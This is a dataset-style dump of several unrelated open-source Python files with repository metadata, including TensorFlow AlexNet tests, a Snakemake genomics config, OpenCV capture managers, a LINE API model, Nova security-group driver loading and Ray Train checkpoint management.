top_k_embedding_count, bottom_k_embedding_count, num_shards,
embedding_type)
p.run()
filenames = tf.io.gfile.glob(
output_tfrecord + '-?????-of-?????')
actual_output = []
record_iterator = tf.data.TFRecordDataset(
tf.convert_to_tensor(filenames)).as_numpy_iterator()
for record in record_iterator:
actual_output.append(record)
self.assertEqual(len(actual_output), 1)
self.assert_expected_example(tf.train.Example.FromString(
actual_output[0]))
if __name__ == '__main__':
tf.test.main()
| [
"[email protected]"
] | |
b548b9f7cdadb399f27f06b74930780a08061e79 | 05d5945350fe64f6c1235d4f12ee22323167ca0c | /snakemake/configs/mm10_SRP044873.py | d77054f2e20301267d8ba829038dad7ea369643b | [
"BSD-2-Clause"
] | permissive | saketkc/re-ribo-smk | 674d4423830bbae3a32f46146ffd362514047a60 | c9326cbafdfa060e22e9af692d9146c37f5035ba | refs/heads/master | 2021-07-12T18:46:37.772947 | 2020-05-30T01:41:13 | 2020-05-30T01:41:13 | 148,952,525 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,542 | py | RAWDATA_DIR = '/staging/as/skchoudh/re-ribo-datasets/mm10/SRP044873'
OUT_DIR = '/staging/as/skchoudh/re-ribo-analysis/mm10/SRP044873'
GENOME_FASTA = '/home/cmb-06/as/skchoudh/genomes/mm10/fasta/Mus_musculus.GRCm38.dna.primary_assembly.fa'
CHROM_SIZES = '/home/cmb-06/as/skchoudh/genomes/mm10/fasta/Mus_musculus.GRCm38.dna.primary_assembly.sizes'
STAR_INDEX = '/home/cmb-06/as/skchoudh/genomes/mm10/star_annotated_ribopod'
GTF_VERSION = 'v96'
GTF = '/home/cmb-06/as/skchoudh/genomes/mm10/annotation/Mus_musculus.GRCm38.96.chr_patch_hapl_scaff.gtf'
GENE_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/gene.bed.gz'
STAR_CODON_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/start_codon.bed.gz'
STOP_CODON_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/stop_codon.bed.gz'
CDS_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/cds.bed.gz'
UTR5_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/utr5.bed.gz'
UTR3_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/utr3.bed.gz'
INTRON_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/intron.bed.gz'
ORIENTATIONS = ['5prime', '3prime']
STRANDS = ['pos', 'neg', 'combined']
FRAGMENT_LENGTHS = range(18, 39)
RIBOTRICER_ANNOTATION_PREFIX = '/home/cmb-06/as/skchoudh/genomes/mm10/ribotricer_v96_annotation_longest'
| [
"[email protected]"
] | |
e73bd41c33e69aa417fab4dffaa549a7814efb51 | 9a73c54526082c27e5c5d88bd54950a589233658 | /DeepLearning/Verification_code_identification/nets/alexnet_test.py | f0dc38b9c9f6f80166eb10b496695e7ac63d676d | [
"Apache-2.0"
] | permissive | archu2020/python-2 | af78b65ed7f3ad17f71d4f8a97c002df86908298 | 19c626ca9fd37168db8a7ac075fd80c8e2971313 | refs/heads/master | 2022-12-27T12:08:44.316760 | 2020-10-02T15:46:27 | 2020-10-02T15:46:27 | 300,660,839 | 0 | 0 | Apache-2.0 | 2020-10-02T15:46:28 | 2020-10-02T15:37:58 | Python | UTF-8 | Python | false | false | 5,964 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for slim.nets.alexnet."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from nets import alexnet
slim = tf.contrib.slim
class AlexnetV2Test(tf.test.TestCase):
def testBuild(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(inputs, num_classes)
self.assertEquals(logits.op.name, 'alexnet_v2/fc8/squeezed')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, num_classes])
def testFullyConvolutional(self):
batch_size = 1
height, width = 300, 400
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(inputs, num_classes, spatial_squeeze=False)
self.assertEquals(logits.op.name, 'alexnet_v2/fc8/BiasAdd')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, 4, 7, num_classes])
def testEndPoints(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
_, end_points = alexnet.alexnet_v2(inputs, num_classes)
expected_names = ['alexnet_v2/conv1',
'alexnet_v2/pool1',
'alexnet_v2/conv2',
'alexnet_v2/pool2',
'alexnet_v2/conv3',
'alexnet_v2/conv4',
'alexnet_v2/conv5',
'alexnet_v2/pool5',
'alexnet_v2/fc6',
'alexnet_v2/fc7',
'alexnet_v2/fc8'
]
self.assertSetEqual(set(end_points.keys()), set(expected_names))
def testModelVariables(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
alexnet.alexnet_v2(inputs, num_classes)
expected_names = ['alexnet_v2/conv1/weights',
'alexnet_v2/conv1/biases',
'alexnet_v2/conv2/weights',
'alexnet_v2/conv2/biases',
'alexnet_v2/conv3/weights',
'alexnet_v2/conv3/biases',
'alexnet_v2/conv4/weights',
'alexnet_v2/conv4/biases',
'alexnet_v2/conv5/weights',
'alexnet_v2/conv5/biases',
'alexnet_v2/fc6/weights',
'alexnet_v2/fc6/biases',
'alexnet_v2/fc7/weights',
'alexnet_v2/fc7/biases',
'alexnet_v2/fc8/weights',
'alexnet_v2/fc8/biases',
]
model_variables = [v.op.name for v in slim.get_model_variables()]
self.assertSetEqual(set(model_variables), set(expected_names))
def testEvaluation(self):
batch_size = 2
height, width = 224, 224
num_classes = 1000
with self.test_session():
eval_inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(eval_inputs, is_training=False)
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, num_classes])
predictions = tf.argmax(logits, 1)
self.assertListEqual(predictions.get_shape().as_list(), [batch_size])
def testTrainEvalWithReuse(self):
train_batch_size = 2
eval_batch_size = 1
train_height, train_width = 224, 224
eval_height, eval_width = 300, 400
num_classes = 1000
with self.test_session():
train_inputs = tf.random_uniform(
(train_batch_size, train_height, train_width, 3))
logits, _ = alexnet.alexnet_v2(train_inputs)
self.assertListEqual(logits.get_shape().as_list(),
[train_batch_size, num_classes])
tf.get_variable_scope().reuse_variables()
eval_inputs = tf.random_uniform(
(eval_batch_size, eval_height, eval_width, 3))
logits, _ = alexnet.alexnet_v2(eval_inputs, is_training=False,
spatial_squeeze=False)
self.assertListEqual(logits.get_shape().as_list(),
[eval_batch_size, 4, 7, num_classes])
logits = tf.reduce_mean(logits, [1, 2])
predictions = tf.argmax(logits, 1)
self.assertEquals(predictions.get_shape().as_list(), [eval_batch_size])
def testForward(self):
batch_size = 1
height, width = 224, 224
with self.test_session() as sess:
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(inputs)
sess.run(tf.global_variables_initializer())
output = sess.run(logits)
self.assertTrue(output.any())
if __name__ == '__main__':
tf.test.main()
| [
"[email protected]"
] | |
d72ecdd7a3b850a399fcd9116f3c384b38b3d1d6 | 181e9cc9cf4e52fcc6e9979890cc5b41e7beb756 | /Module 1/06_Codes/06/06_Codes/managers.py | c2650fc77fbc09ebd2367a198a7481ec81ec29c4 | [
"MIT"
] | permissive | PacktPublishing/OpenCV-Computer-Vision-Projects-with-Python | ace8576dce8d5f5db6992b3e5880a717996f78cc | 45a9c695e5bb29fa3354487e52f29a565d700d5c | refs/heads/master | 2023-02-09T14:10:42.767047 | 2023-01-30T09:02:09 | 2023-01-30T09:02:09 | 71,112,659 | 96 | 72 | null | null | null | null | UTF-8 | Python | false | false | 6,862 | py | import cv2
import numpy
import pygame
import time
import utils
class CaptureManager(object):
def __init__(self, capture, previewWindowManager = None,
shouldMirrorPreview = False):
self.previewWindowManager = previewWindowManager
self.shouldMirrorPreview = shouldMirrorPreview
self._capture = capture
self._channel = 0
self._enteredFrame = False
self._frame = None
self._imageFilename = None
self._videoFilename = None
self._videoEncoding = None
self._videoWriter = None
self._startTime = None
self._framesElapsed = long(0)
self._fpsEstimate = None
@property
def channel(self):
return self._channel
@channel.setter
def channel(self, value):
if self._channel != value:
self._channel = value
self._frame = None
@property
def frame(self):
if self._enteredFrame and self._frame is None:
_, self._frame = self._capture.retrieve(channel = self.channel)
return self._frame
@property
def isWritingImage(self):
return self._imageFilename is not None
@property
def isWritingVideo(self):
return self._videoFilename is not None
def enterFrame(self):
"""Capture the next frame, if any."""
# But first, check that any previous frame was exited.
assert not self._enteredFrame, \
'previous enterFrame() had no matching exitFrame()'
if self._capture is not None:
self._enteredFrame = self._capture.grab()
def exitFrame(self):
"""Draw to the window. Write to files. Release the frame."""
# Check whether any grabbed frame is retrievable.
# The getter may retrieve and cache the frame.
if self.frame is None:
self._enteredFrame = False
return
# Update the FPS estimate and related variables.
if self._framesElapsed == 0:
self._startTime = time.time()
else:
timeElapsed = time.time() - self._startTime
self._fpsEstimate = self._framesElapsed / timeElapsed
self._framesElapsed += 1
# Draw to the window, if any.
if self.previewWindowManager is not None:
if self.shouldMirrorPreview:
mirroredFrame = numpy.fliplr(self._frame).copy()
self.previewWindowManager.show(mirroredFrame)
else:
self.previewWindowManager.show(self._frame)
# Write to the image file, if any.
if self.isWritingImage:
cv2.imwrite(self._imageFilename, self._frame)
self._imageFilename = None
# Write to the video file, if any.
self._writeVideoFrame()
# Release the frame.
self._frame = None
self._enteredFrame = False
def writeImage(self, filename):
"""Write the next exited frame to an image file."""
self._imageFilename = filename
def startWritingVideo(
self, filename,
encoding = cv2.cv.CV_FOURCC('I','4','2','0')):
"""Start writing exited frames to a video file."""
self._videoFilename = filename
self._videoEncoding = encoding
def stopWritingVideo(self):
"""Stop writing exited frames to a video file."""
self._videoFilename = None
self._videoEncoding = None
self._videoWriter = None
def _writeVideoFrame(self):
if not self.isWritingVideo:
return
if self._videoWriter is None:
fps = self._capture.get(cv2.cv.CV_CAP_PROP_FPS)
if fps == 0.0:
# The capture's FPS is unknown so use an estimate.
if self._framesElapsed < 20:
# Wait until more frames elapse so that the
# estimate is more stable.
return
else:
fps = self._fpsEstimate
size = (int(self._capture.get(
cv2.cv.CV_CAP_PROP_FRAME_WIDTH)),
int(self._capture.get(
cv2.cv.CV_CAP_PROP_FRAME_HEIGHT)))
self._videoWriter = cv2.VideoWriter(
self._videoFilename, self._videoEncoding,
fps, size)
self._videoWriter.write(self._frame)
class WindowManager(object):
def __init__(self, windowName, keypressCallback = None):
self.keypressCallback = keypressCallback
self._windowName = windowName
self._isWindowCreated = False
@property
def isWindowCreated(self):
return self._isWindowCreated
def createWindow(self):
cv2.namedWindow(self._windowName)
self._isWindowCreated = True
def show(self, frame):
cv2.imshow(self._windowName, frame)
def destroyWindow(self):
cv2.destroyWindow(self._windowName)
self._isWindowCreated = False
def processEvents(self):
keycode = cv2.waitKey(1)
if self.keypressCallback is not None and keycode != -1:
# Discard any non-ASCII info encoded by GTK.
keycode &= 0xFF
self.keypressCallback(keycode)
class PygameWindowManager(WindowManager):
def createWindow(self):
pygame.display.init()
pygame.display.set_caption(self._windowName)
self._isWindowCreated = True
def show(self, frame):
# Find the frame's dimensions in (w, h) format.
frameSize = frame.shape[1::-1]
# Convert the frame to RGB, which Pygame requires.
if utils.isGray(frame):
conversionType = cv2.COLOR_GRAY2RGB
else:
conversionType = cv2.COLOR_BGR2RGB
rgbFrame = cv2.cvtColor(frame, conversionType)
# Convert the frame to Pygame's Surface type.
pygameFrame = pygame.image.frombuffer(
rgbFrame.tostring(), frameSize, 'RGB')
# Resize the window to match the frame.
displaySurface = pygame.display.set_mode(frameSize)
# Blit and display the frame.
displaySurface.blit(pygameFrame, (0, 0))
pygame.display.flip()
def destroyWindow(self):
pygame.display.quit()
self._isWindowCreated = False
def processEvents(self):
for event in pygame.event.get():
if event.type == pygame.KEYDOWN and \
self.keypressCallback is not None:
self.keypressCallback(event.key)
elif event.type == pygame.QUIT:
self.destroyWindow()
return | [
"[email protected]"
] | |
549d26bdfebb26f7e41ffa553e48b04e054ae011 | 5e255ad1360c90478393744586663741a9569c21 | /linebot/v3/insight/models/get_statistics_per_unit_response_overview.py | 8dead06a2e9bdba632aa7f0ff33642dfff6804fd | [
"Apache-2.0"
] | permissive | line/line-bot-sdk-python | d76268e8b542060d6eccbacc5dbfab16960ecc35 | cffd35948238ae24982173e30b1ea1e595bbefd9 | refs/heads/master | 2023-08-31T22:12:31.698183 | 2023-08-28T01:10:09 | 2023-08-28T01:10:09 | 70,553,423 | 1,898 | 1,181 | Apache-2.0 | 2023-09-11T05:14:07 | 2016-10-11T03:42:26 | Python | UTF-8 | Python | false | false | 4,122 | py | # coding: utf-8
"""
LINE Messaging API(Insight)
This document describes LINE Messaging API(Insight). # noqa: E501
The version of the OpenAPI document: 0.0.1
Generated by OpenAPI Generator (https://openapi-generator.tech)
Do not edit the class manually.
"""
from __future__ import annotations
import pprint
import re # noqa: F401
import json
from typing import Optional
from pydantic.v1 import BaseModel, Field, StrictInt
class GetStatisticsPerUnitResponseOverview(BaseModel):
"""
Statistics related to messages.
https://developers.line.biz/en/reference/messaging-api/#get-statistics-per-unit-response
"""
unique_impression: Optional[StrictInt] = Field(None, alias="uniqueImpression", description="Number of users who opened the message, meaning they displayed at least 1 bubble.")
unique_click: Optional[StrictInt] = Field(None, alias="uniqueClick", description="Number of users who opened any URL in the message.")
unique_media_played: Optional[StrictInt] = Field(None, alias="uniqueMediaPlayed", description="Number of users who started playing any video or audio in the message.")
unique_media_played100_percent: Optional[StrictInt] = Field(None, alias="uniqueMediaPlayed100Percent", description="Number of users who played the entirety of any video or audio in the message.")
__properties = ["uniqueImpression", "uniqueClick", "uniqueMediaPlayed", "uniqueMediaPlayed100Percent"]
class Config:
"""Pydantic configuration"""
allow_population_by_field_name = True
validate_assignment = True
def to_str(self) -> str:
"""Returns the string representation of the model using alias"""
return pprint.pformat(self.dict(by_alias=True))
def to_json(self) -> str:
"""Returns the JSON representation of the model using alias"""
return json.dumps(self.to_dict())
@classmethod
def from_json(cls, json_str: str) -> GetStatisticsPerUnitResponseOverview:
"""Create an instance of GetStatisticsPerUnitResponseOverview from a JSON string"""
return cls.from_dict(json.loads(json_str))
def to_dict(self):
"""Returns the dictionary representation of the model using alias"""
_dict = self.dict(by_alias=True,
exclude={
},
exclude_none=True)
# set to None if unique_impression (nullable) is None
# and __fields_set__ contains the field
if self.unique_impression is None and "unique_impression" in self.__fields_set__:
_dict['uniqueImpression'] = None
# set to None if unique_click (nullable) is None
# and __fields_set__ contains the field
if self.unique_click is None and "unique_click" in self.__fields_set__:
_dict['uniqueClick'] = None
# set to None if unique_media_played (nullable) is None
# and __fields_set__ contains the field
if self.unique_media_played is None and "unique_media_played" in self.__fields_set__:
_dict['uniqueMediaPlayed'] = None
# set to None if unique_media_played100_percent (nullable) is None
# and __fields_set__ contains the field
if self.unique_media_played100_percent is None and "unique_media_played100_percent" in self.__fields_set__:
_dict['uniqueMediaPlayed100Percent'] = None
return _dict
@classmethod
def from_dict(cls, obj: dict) -> GetStatisticsPerUnitResponseOverview:
"""Create an instance of GetStatisticsPerUnitResponseOverview from a dict"""
if obj is None:
return None
if not isinstance(obj, dict):
return GetStatisticsPerUnitResponseOverview.parse_obj(obj)
_obj = GetStatisticsPerUnitResponseOverview.parse_obj({
"unique_impression": obj.get("uniqueImpression"),
"unique_click": obj.get("uniqueClick"),
"unique_media_played": obj.get("uniqueMediaPlayed"),
"unique_media_played100_percent": obj.get("uniqueMediaPlayed100Percent")
})
return _obj
| [
"[email protected]"
] | |
97d15d6f45852f8ad8f5576eff06fea5cb1089b3 | 43cbef9a8b7424fb7144255d1d9494be828e3b4c | /nes_randomizer/registration/urls.py | a6c54bd79ab683e6b46d4559d9fdcb440476523a | [] | no_license | thebmo/NESRandomizer | 59135814c3dd23d948af1f5ce7ca236c8f96dc56 | 1bad8c3ba8ed2a513f3ecd7005023f063fc3ba1f | refs/heads/master | 2020-07-05T08:19:02.916233 | 2015-11-03T03:34:32 | 2015-11-03T03:34:32 | 22,393,483 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('',
url(r'^$', views.register, name='register'),
)
| [
"[email protected]"
] | |
46605773042e4694045207282c63666f3ac7d88a | b5550fc728b23cb5890fd58ccc5e1668548dc4e3 | /network/security_group/openstack_driver.py | 9717ba421b4a63ea98d5328cfd53bec9b7f01766 | [] | no_license | bopopescu/nova-24 | 0de13f078cf7a2b845cf01e613aaca2d3ae6104c | 3247a7199932abf9718fb3260db23e9e40013731 | refs/heads/master | 2022-11-20T00:48:53.224075 | 2016-12-22T09:09:57 | 2016-12-22T09:09:57 | 282,140,423 | 0 | 0 | null | 2020-07-24T06:24:14 | 2020-07-24T06:24:13 | null | UTF-8 | Python | false | false | 1,631 | py | #coding:utf-8
# Copyright 2013 Nicira, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
from nova.openstack.common import importutils
security_group_opts = [
cfg.StrOpt('security_group_api',
default='nova',
help='The full class name of the security API class'),
]
CONF = cfg.CONF
CONF.register_opts(security_group_opts)
NOVA_DRIVER = ('nova.api.openstack.compute.contrib.security_groups.'
'NativeNovaSecurityGroupAPI')
NEUTRON_DRIVER = ('nova.api.openstack.compute.contrib.security_groups.'
'NativeNeutronSecurityGroupAPI')
def get_openstack_security_group_driver():
if CONF.security_group_api.lower() == 'nova':
return importutils.import_object(NOVA_DRIVER)
elif CONF.security_group_api.lower() in ('neutron', 'quantum'):
return importutils.import_object(NEUTRON_DRIVER)
else:
return importutils.import_object(CONF.security_group_api)
def is_neutron_security_groups():
return CONF.security_group_api.lower() in ('neutron', 'quantum')
| [
"[email protected]"
] | |
0d8cf3d920dc76f0c4b05c2d553f6846e4799bcb | edc80b253c0ad88a421f7cd341d695e601fde73d | /utils.py | 1194f99c9f18970a5625febf931cca1ec72e84ff | [
"MIT"
] | permissive | prashantramangupta/snet-platform-usage | 62cc4061326e89ca39c1b3105362fc4b4fb9509c | 41b0669ebebf116012f312a333d0b3cbcdcf8519 | refs/heads/master | 2022-11-04T23:57:35.611828 | 2022-10-13T05:03:05 | 2022-10-13T05:03:05 | 177,531,350 | 1 | 1 | MIT | 2022-10-12T10:20:37 | 2019-03-25T06:56:31 | Python | UTF-8 | Python | false | false | 1,607 | py | import json
import datetime
import decimal
import requests
from constant import SLACK_HOOK
IGNORED_LIST = ['row_id', 'row_created', 'row_updated']
class Utils:
def __init__(self):
self.msg_type = {
0 : 'info:: ',
1 : 'err:: '
}
def report_slack(self, type, slack_msg):
url = SLACK_HOOK['hostname'] + SLACK_HOOK['path']
prefix = self.msg_type.get(type, "")
print(url)
payload = {"channel": "#contract-index-alerts",
"username": "webhookbot",
"text": prefix + slack_msg,
"icon_emoji": ":ghost:"
}
resp = requests.post(url=url, data=json.dumps(payload))
print(resp.status_code, resp.text)
def clean(self, value_list):
for value in value_list:
self.clean_row(value)
def clean_row(self, row):
for item in IGNORED_LIST:
del row[item]
for key in row:
if isinstance(row[key], decimal.Decimal) or isinstance(row[key], datetime.datetime):
row[key] = str(row[key])
elif isinstance(row[key], bytes):
if row[key] == b'\x01':
row[key] = 1
elif row[key] == b'\x00':
row[key] = 0
else:
raise Exception("Unsupported bytes object. Key " + str(key) + " value " + str(row[key]))
return row
def remove_http_https_prefix(self, url):
url = url.replace("https://","")
url = url.replace("http://","")
return url | [
"[email protected]"
] | |
33673f2e8184b5c2020942244cf7cd80e01a59c1 | ad0e853db635edc578d58891b90f8e45a72a724f | /python/ray/train/_internal/checkpoint.py | 82c25febb8b0d79b04a829842a8758c8d245538a | [
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] | permissive | ericl/ray | 8c93fc713af3b753215d4fe6221278700936e2db | e9a1c6d814fb1a81033809f56695030d651388f5 | refs/heads/master | 2023-08-31T11:53:23.584855 | 2023-06-07T21:04:28 | 2023-06-07T21:04:28 | 91,077,004 | 2 | 4 | Apache-2.0 | 2023-01-11T17:19:10 | 2017-05-12T09:51:04 | Python | UTF-8 | Python | false | false | 11,154 | py | import os
import logging
from pathlib import Path
from typing import Callable, Dict, List, Optional, Type, Union
from ray.air import Checkpoint, CheckpointConfig, session
from ray.air._internal.checkpoint_manager import CheckpointStorage
from ray.air._internal.checkpoint_manager import (
_CheckpointManager as CommonCheckpointManager,
)
from ray.air._internal.checkpoint_manager import _TrackedCheckpoint
from ray.train._internal.session import TrainingResult
from ray.train._internal.utils import construct_path
from ray.train.constants import (
CHECKPOINT_RANK_KEY,
TRAIN_CHECKPOINT_SUBDIR,
TUNE_CHECKPOINT_ID,
TUNE_INSTALLED,
CHECKPOINT_METADATA_KEY,
LAZY_CHECKPOINT_MARKER_FILE,
)
from ray.air.constants import TIMESTAMP
if TUNE_INSTALLED:
from ray import tune
else:
tune = None
logger = logging.getLogger(__name__)
def load_checkpoint_from_path(checkpoint_to_load: Union[str, Path]) -> Checkpoint:
"""Utility function to load a checkpoint from a path."""
checkpoint_path = Path(checkpoint_to_load).expanduser()
if not checkpoint_path.exists():
raise ValueError(f"Checkpoint path {checkpoint_path} does not exist.")
checkpoint = Checkpoint.from_directory(str(checkpoint_path))
return checkpoint
class CheckpointManager(CommonCheckpointManager):
"""Manages checkpoint processing, writing, and loading.
- A ``checkpoints`` directory is created in the ``run_dir`` and contains
all the checkpoint files.
The full default path will be:
~/ray_results/train_<datestring>/run_<run_id>/checkpoints/
checkpoint_<checkpoint_id>
Attributes:
latest_checkpoint_dir: Path to the file directory for
the checkpoints from the latest run. Configured through
``start_training``.
latest_checkpoint_filename: Filename for the latest
checkpoint.
next_checkpoint_path: Path to the next checkpoint to
persist from the latest run.
best_checkpoint_path: Path to the best persisted
checkpoint from the latest run.
latest_checkpoint_id: The id of the most recently
saved checkpoint.
latest_checkpoint: The latest saved checkpoint. This
checkpoint may not be saved to disk.
"""
_persist_memory_checkpoints = True
def __init__(
self,
run_dir: Optional[Path] = None,
checkpoint_strategy: Optional[CheckpointConfig] = None,
):
self.run_dir = run_dir
super().__init__(checkpoint_strategy=checkpoint_strategy)
self._validate_checkpoint_strategy()
def _validate_checkpoint_strategy(self):
if self._checkpoint_strategy.checkpoint_score_attribute is None:
self._checkpoint_strategy.checkpoint_score_attribute = TIMESTAMP
def _load_checkpoint(
self, checkpoint_to_load: Optional[Union[Dict, str, Path, Checkpoint]]
) -> Optional[Checkpoint]:
"""Load the checkpoint dictionary from the input dict or path."""
if checkpoint_to_load is None:
return None
if isinstance(checkpoint_to_load, Dict):
return Checkpoint.from_dict(checkpoint_to_load)
if isinstance(checkpoint_to_load, Checkpoint):
return checkpoint_to_load
else:
# Load checkpoint from path.
return load_checkpoint_from_path(checkpoint_to_load)
def _process_checkpoint(
self,
checkpoint_result: TrainingResult,
decode_checkpoint_fn: Callable,
) -> _TrackedCheckpoint:
checkpoint_data = checkpoint_result.data
checkpoint_metadata = checkpoint_result.metadata or {}
checkpoint_rank = checkpoint_metadata.get(CHECKPOINT_RANK_KEY, 0)
if isinstance(checkpoint_data, str):
checkpoint_class: Type[Checkpoint] = checkpoint_metadata[
CHECKPOINT_METADATA_KEY
].checkpoint_type
checkpoint_data = checkpoint_class.from_directory(checkpoint_data)
checkpoint_data._metadata = checkpoint_metadata[CHECKPOINT_METADATA_KEY]
else:
# TODO(ml-team): Remove once we remove Backend.decode_data
checkpoint_data = decode_checkpoint_fn(checkpoint_data)
score_attr = self._checkpoint_strategy.checkpoint_score_attribute
if (
self._checkpoint_strategy.num_to_keep != 0
and score_attr not in checkpoint_metadata
):
raise ValueError(
f"Unable to persist checkpoint for "
f"checkpoint_score_attribute: "
f"{score_attr}. "
f"Include this attribute in the call to "
f"`session.report()`."
)
return _TrackedCheckpoint(
dir_or_data=checkpoint_data,
checkpoint_id=self._latest_checkpoint_id,
storage_mode=CheckpointStorage.MEMORY,
metrics={score_attr: checkpoint_metadata.get(score_attr, 0.0)},
rank=checkpoint_rank,
)
def _process_checkpoints(
self,
checkpoint_results: List[TrainingResult],
decode_checkpoint_fn: Callable,
) -> None:
"""Ray Train entrypoint. Perform all processing for a checkpoint."""
if self._checkpoint_strategy._checkpoint_keep_all_ranks:
tracked_checkpoints = [
self._process_checkpoint(checkpoint_result, decode_checkpoint_fn)
for checkpoint_result in checkpoint_results
]
else:
# Get checkpoint from first worker.
tracked_checkpoints = [
self._process_checkpoint(checkpoint_results[0], decode_checkpoint_fn)
]
self.register_checkpoints(checkpoints=tracked_checkpoints)
def _get_next_checkpoint_path(self) -> Optional[Path]:
"""Path to the next checkpoint to persist."""
checkpoint_path = _construct_checkpoint_path_name(
self._latest_checkpoint_id + 1
)
return self.latest_checkpoint_dir.joinpath(checkpoint_path)
def on_start_training(
self,
checkpoint_strategy: Optional[CheckpointConfig],
run_dir: Path,
latest_checkpoint_id: Optional[int] = 0,
):
checkpoint_strategy = checkpoint_strategy or CheckpointConfig()
self._checkpoint_strategy = checkpoint_strategy
self._validate_checkpoint_strategy()
self.run_dir = run_dir
self._latest_checkpoint_id = latest_checkpoint_id or 0
# Train-specific attributes
@property
def latest_checkpoint(self):
if not self._latest_memory_checkpoint:
return None
return self._latest_memory_checkpoint.dir_or_data
@property
def latest_checkpoint_dir(self) -> Optional[Path]:
"""Path to the latest checkpoint directory."""
checkpoint_dir = Path(TRAIN_CHECKPOINT_SUBDIR)
return construct_path(checkpoint_dir, self.run_dir)
@property
def latest_checkpoint_file_name(self) -> Optional[str]:
"""Filename to use for the latest checkpoint."""
if self._latest_checkpoint_id > 0:
return _construct_checkpoint_path_name(self._latest_checkpoint_id)
else:
return None
@property
def next_checkpoint_path(self) -> Optional[Path]:
"""Path to the next checkpoint to persist."""
checkpoint_file = _construct_checkpoint_path_name(
self._latest_checkpoint_id + 1
)
return self.latest_checkpoint_dir.joinpath(checkpoint_file)
@property
def best_checkpoint_path(self) -> Optional[Path]:
"""Path to the best persisted checkpoint."""
if self._best_persisted_checkpoint:
return Path(self._best_persisted_checkpoint.dir_or_data)
else:
return None
@property
def latest_checkpoint_id(self) -> Optional[int]:
"""The checkpoint id of most recently saved checkpoint.
If no checkpoint has been saved yet, then return None.
"""
checkpoint_id = self._latest_checkpoint_id
if checkpoint_id == 0:
return None
else:
return checkpoint_id
class TuneCheckpointManager(CheckpointManager):
def __init__(
self,
run_dir: Optional[Path] = None,
checkpoint_strategy: Optional[CheckpointConfig] = None,
):
super().__init__(run_dir, checkpoint_strategy)
# Name of the marker dropped by the Trainable. If a worker detects
# the presence of the marker in the trial dir, it will use lazy
# checkpointing.
self._lazy_marker_path = None
if tune.is_session_enabled():
self._lazy_marker_path = (
Path(session.get_trial_dir()) / LAZY_CHECKPOINT_MARKER_FILE
)
with open(self._lazy_marker_path, "w"):
pass
def _load_checkpoint(
self, checkpoint_to_load: Optional[Union[Dict, str, Path, Checkpoint]]
) -> Optional[Union[Dict, Checkpoint]]:
loaded_checkpoint = super()._load_checkpoint(checkpoint_to_load)
assert not loaded_checkpoint or isinstance(loaded_checkpoint, Checkpoint)
# `latest_checkpoint_id` will be the id assigned to the next checkpoint,
# which should be one more than the loaded checkpoint's id
# If no checkpoint is loaded, initialize this to 0
self._latest_checkpoint_id = (
getattr(loaded_checkpoint, TUNE_CHECKPOINT_ID, -1) + 1
)
return loaded_checkpoint
def add_tune_checkpoint_id(self, checkpoint: Checkpoint):
# Store the checkpoint_id in the file so that the Tune trial can be
# resumed after failure or cancellation.
setattr(checkpoint, TUNE_CHECKPOINT_ID, self._latest_checkpoint_id)
def _process_persistent_checkpoint(self, checkpoint: _TrackedCheckpoint):
self.add_tune_checkpoint_id(checkpoint.dir_or_data)
# Train may choose not to commit a checkpoint, but make sure the
# checkpoint is always committed for Tuning purpose.
# After this is committed, checkpoint.dir_or_path will become a string,
# which will prevent this checkpoint from being commtted again in the
# subsequent super()._process_persistent_checkpoint() call.
with tune.checkpoint_dir(step=self._latest_checkpoint_id) as checkpoint_dir:
path = Path(checkpoint_dir)
checkpoint.commit(path)
return super()._process_persistent_checkpoint(checkpoint)
@property
def latest_checkpoint_dir(self) -> Optional[Path]:
raise NotImplementedError
@property
def next_checkpoint_path(self) -> Optional[Path]:
return None
def _get_next_checkpoint_path(self) -> Optional[Path]:
return None
def __del__(self):
try:
assert self._lazy_marker_path
os.remove(str(self._lazy_marker_path))
except Exception:
pass
return super().__del__()
